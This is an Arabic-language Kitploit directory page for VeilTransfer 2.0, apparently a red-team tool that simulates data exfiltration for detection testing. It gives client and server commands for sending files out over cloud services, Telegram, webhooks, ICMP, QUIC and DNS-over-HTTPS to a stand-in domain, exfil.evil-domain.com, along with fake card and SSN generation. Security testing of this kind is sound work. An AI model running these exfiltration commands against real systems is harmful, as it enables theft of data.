Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
VeilTransfer — VeilTransfer is a data exfiltration utility designed to test and enhance the detection capabilities. This tool simulates real-world data exfiltration techniques used by advanced threat actors, allowing organizations to evaluate and improve their security posture. | Kitploit
أدوات/GitHubGitHub/infosecn1nja/veiltransfer
Data ExfiltrationNetwork SecurityPenetration TestingRed Teaming
GitHubinfosecn1nja/veiltransfer

VeilTransfer

VeilTransfer is a data exfiltration utility designed to test and enhance the detection capabilities. This tool simulates real-world data exfiltration techniques used by advanced threat actors, allowing organizations to evaluate and improve their security posture.

عرض المستودع
15722منذ 7 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

VeilTransfer 2.0

VeilTransfer هي أداة لاستخراج البيانات مصمَّمة لاختبار وتحسين قدرات الكشف. تحاكي هذه الأداة تقنيات استخراج البيانات الواقعية التي يستخدمها المهاجمون المتقدّمون، مما يتيح للمؤسسات تقييم وتحسين وضعها الأمني. من خلال الاستفادة من طرق متعددة لاستخراج البيانات مثل MEGA وGitHub وSFTP وWebDAV وغيرها، تساعد VeilTransfer في تحديد الثغرات في دفاعاتك وتضمن أن تكون حلولك الأمنية جاهزة لمواجهة خروقات البيانات الحديثة.

طرق استخراج البيانات المدعومة

  • MEGA
  • GitHub
  • Dropbox
  • Telegram
  • Pastebin
  • WebDAV
  • Webhook
  • SFTP
  • FTP
  • DoH (DNS over HTTPS)
  • QUIC
  • ICMP

مطابقة MITRE ATT&CK

IDTechniques
T1029Scheduled Transfer
T1020Automated Exfiltration
T1132.001Data Encoding: Standard Encoding
T1560.002Archive Collected Data: Archive via Library
T1567.001Exfiltration Over Web Service: Exfiltration to Code Repository
T1567.002Exfiltration Over Web Service: Exfiltration to Cloud Storage
T1567.003Exfiltration Over Web Service: Exfiltration to Text Storage
T1567.004Exfiltration Over Web Service: Exfiltration Over Webhook
T1048.003Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
T1048.002Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

ميزات إضافية

توليد البيانات الوهمية

يدعم VeilTransfer أيضًا توليد بيانات وهمية، بما في ذلك:

  • أرقام بطاقة الهوية الإندونيسية (KTP): توليد أرقام KTP واقعية وبيانات مرتبطة بها.
  • معلومات بطاقات الائتمان: إنشاء تفاصيل بطاقات ائتمان وهمية بصيغة PCI DSS، بما في ذلك الاسم الأول، اسم العائلة، رقم البطاقة (Visa/MasterCard/AMEX)، وتاريخ الانتهاء.
  • أرقام الضمان الاجتماعي (SSN): توليد أرقام SSN وهمية لاستخدامها في عمليات المحاكاة وبيئات الاختبار.
  • السجلات الطبية: توليد بيانات سجلات طبية وهمية باللغة الإندونيسية (id) أو الإنجليزية (en).

إنشاء ملفات Zip

أنشئ ملفات zip بسهولة لتجميع البيانات وضغطها، والتي يمكن استخدامها بعد ذلك لاستخراج البيانات أو لاختبار سيناريوهات مختلفة. يدعم الأداة تقسيم الملفات اختياريًا إلى عدة أجزاء بناءً على الحجم.

حالات استخدام مثال

  • عمليات الفريق الأحمر: انشر VeilTransfer أثناء تمارين الفريق الأحمر لتتحدى الفرق الزرقاء بسيناريوهات استخراج بيانات متطورة وواقعية.
  • العمل الجماعي الأرجواني: تعاون مع فرقك الدفاعية لمحاكاة محاولات استخراج البيانات ثم اكتشافها، مع تحسين التكتيكات الهجومية والدفاعية معًا.
  • الاختبار الأمني: استخدم VeilTransfer للتحقق من فعالية حلول DLP وNDR وجدار الحماية وغيرها من إجراءات أمن الشبكات.

مثال على الاستخدام

النقل

نقل ملف عبر SFTP

يوضح هذا المثال كيفية نقل ملف بشكل آمن إلى خادم بعيد باستخدام بروتوكول SFTP. الملف موجود على الجهاز المحلي، ويتم نقله إلى الدليل البعيد المحدد باستخدام مصادقة SSH.

root@kitploit:~
veiltransfer_client transfer sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass

نقل الملفات إلى خادم WebDAV

في هذا المثال، يتم رفع الملفات من دليل محلي إلى خادم WebDAV. يتطلب الخادم اسم مستخدم وكلمة مرور للمصادقة. تتضمن معلمة الخادم مخطط URI (https:// أو http://).

root@kitploit:~
veiltransfer_client transfer webdav -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass

نقل الملفات إلى سحابة Mega

يوضح هذا المثال كيفية نقل الملفات إلى وحدة تخزين سحابة Mega. يتم رفع الملفات من دليل محلي محدد، وتتم المصادقة باستخدام بيانات اعتماد مستخدم Mega Cloud.

root@kitploit:~
veiltransfer_client transfer mega -localPath (/path/to/file or /path/to/directory) -username [email protected] -password megasecretpassword

نقل الملفات عبر FTP

في هذا المثال، يتم رفع ملف إلى خادم FTP. يتم نقل الملف إلى دليل محدد على الخادم البعيد. يتطلب الخادم اسم مستخدم وكلمة مرور للمصادقة.

root@kitploit:~
veiltransfer_client transfer ftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword

رفع ملف إلى Pastebin

يوضح هذا المثال كيفية رفع محتويات ملف إلى Pastebin. يتم نشر المحتوى على Pastebin باستخدام مفتاح API يوفره المستخدم.

root@kitploit:~
veiltransfer_client transfer pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key

إرسال ملف إلى مستودع GitHub

يوضح هذا المثال كيفية دفع ملف من الجهاز المحلي إلى مستودع GitHub محدد. تتم إضافة الملف إلى المستودع باستخدام رمز API الخاص بمستخدم GitHub للمصادقة.

root@kitploit:~
veiltransfer_client transfer github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token

إرسال ملف إلى قناة Telegram

يوضح هذا المثال كيفية إرسال ملف إلى قناة Telegram محددة. يتم إرسال الملف باستخدام رمز API لبوت Telegram، ويتم تسليم الرسالة إلى معرف القناة المحدد.

root@kitploit:~
veiltransfer_client transfer telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789

إرسال البيانات إلى عنوان Webhook

في هذا المثال، يتم إرسال محتويات ملف إلى عنوان Webhook محدد.

root@kitploit:~
veiltransfer_client transfer webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url

نقل الملفات عبر DoH (DNS over HTTPS)

لإنشاء آلية آمنة لاستخراج البيانات باستخدام DNS over HTTPS (DoH)، يجب تكوين سجلات DNS التالية:

  1. سجل A: وجّه test إلى عنوان IP <VeilTransfer_IP_Address>.

    test -> <VeilTransfer_IP_Address>

  2. سجل NS: حدد نطاقًا فرعيًا (exfil) تتم إدارته بواسطة evil-domain.com.

    exfil -> test.evil-domain.com

سيعمل النطاق exfil.evil-domain.com كنطاق استخراج DNS.

بعد ذلك، ابدأ خادم VeilTransfer في وضع DoH باستخدام الأمر التالي:

root@kitploit:~
veiltransfer_server doh -key ag36rjsg284nfk2g -folder /root/data/exfil

ملاحظة: يجب أن يكون طول مفتاح التشفير (-key) 16 أو 32 حرفًا.

لرفع الملفات عبر DoH، تأكد من أن خادم VeilTransfer يعمل بنشاط في وضع DoH بمفتاح تشفير صالح. ثم ابدأ النقل باستخدام أمر العميل:

root@kitploit:~
veiltransfer_client transfer doh -localPath /path/to/file_or_directory -key ag36rjsg284nfk2g -dnsServer exfil.evil-domain.com

نقل الملفات عبر QUIC

لبدء تشغيل خادم VeilTransfer في وضع QUIC، استخدم الأمر التالي:

root@kitploit:~
veiltransfer_server quic -cert /path/server.crt -key /path/server.key

بمجرد تشغيل الخادم، يمكنك رفع الملفات أو الدلائل باستخدام:

root@kitploit:~
veiltransfer_client transfer quic -localPath (/path/to/file or /path/to/directory) -server example.com:443

نقل الملفات عبر ICMP

لتمكين نقل الملفات عبر بروتوكول ICMP، ابدأ تشغيل خادم VeilTransfer في وضع ICMP عن طريق تنفيذ الأمر التالي:

root@kitploit:~
veiltransfer_server_linux icmp -folder /path/folder

بمجرد أن يصبح الخادم نشطًا، نفّذ الأمر التالي لنقل الملفات أو الدلائل عبر ICMP:

root@kitploit:~
veiltransfer_client_linux transfer icmp -localPath (/path/to/file or /path/to/directory) -server <ip address>

إنشاء ملفات Zip

إنشاء ملف Zip بسيط

ينشئ أرشيف zip من دليل محدد.

root@kitploit:~
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip

إنشاء ملف Zip مقسّم

ينشئ أرشيف zip مقسمًا إلى عدة أجزاء بناءً على الحجم المحدد.

root@kitploit:~
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000

مولّد البيانات

توليد 100 رقم بطاقة ائتمان وهمي

يوضح هذا المثال كيفية توليد 100 إدخال لبيانات بطاقات ائتمان وهمية. ستتضمن البيانات التي يتم توليدها أرقام بطاقات الائتمان وتواريخ الانتهاء والتفاصيل المرتبطة بها.

root@kitploit:~
veiltransfer_client generate-fake -ccn -count 100

توليد 50 إدخال KTP إندونيسي وهمي

يوضح هذا المثال كيفية توليد 50 إدخالًا لبيانات KTP وهمية، وهي بطاقات الهوية الإندونيسية. تتضمن البيانات معلومات شخصية مثل الاسم والعنوان ورقم KTP.

root@kitploit:~
veiltransfer_client generate-fake -ktp -count 50

توليد 200 رقم ضمان اجتماعي وهمي

تتضمن البيانات التي يتم توليدها أرقام الضمان الاجتماعي المنسقة وفقًا للمعايير الأمريكية.

root@kitploit:~
veiltransfer_client generate-fake -ssn -count 200

توليد 300 سجل طبي وهمي باللغة الإنجليزية

يوضح هذا المثال كيفية توليد 300 سجل طبي وهمي باللغة الإنجليزية.

root@kitploit:~
veiltransfer_client generate-fake -medical-record -count 300 -language en

المساهمة

المساهمات في VeilTransfer مرحب بها! إذا كانت لديك أفكار لميزات جديدة أو طرق استخراج بيانات أو تحسينات، فيرجى إرسال طلب سحب (pull request) أو فتح مشكلة (issue) على GitHub.

تنزيل الأداة